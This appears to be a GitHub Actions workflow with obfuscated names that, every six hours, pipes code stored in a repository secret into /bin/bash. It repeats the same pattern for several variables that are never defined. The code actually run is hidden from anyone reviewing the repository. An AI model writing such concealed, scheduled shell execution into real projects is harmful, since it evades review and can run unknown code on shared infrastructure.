name: caohong19870101
on:
  workflow_dispatch:
  schedule:
    - cron: '49 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: caohong19870101
        env:
          hxagv8347: ${{ secrets.hxagv8347 }}
        run: |
          echo $hxagv8347 | jq -r .nuo05172 | /bin/bash
          echo $vciwi47938 | jq -r .yygd563 | /bin/bash
          echo $vjzkm2 | jq -r .d234 | /bin/bash
          echo $mnnry43 | jq -r .wndkh0 | /bin/bash
          echo $uxh2330 | jq -r .o4 | /bin/bash
          echo $dlf44 | jq -r .l6439 | /bin/bash
          echo $uk333 | jq -r .qylr7 | /bin/bash
          echo $t88615 | jq -r .jt493 | /bin/bash

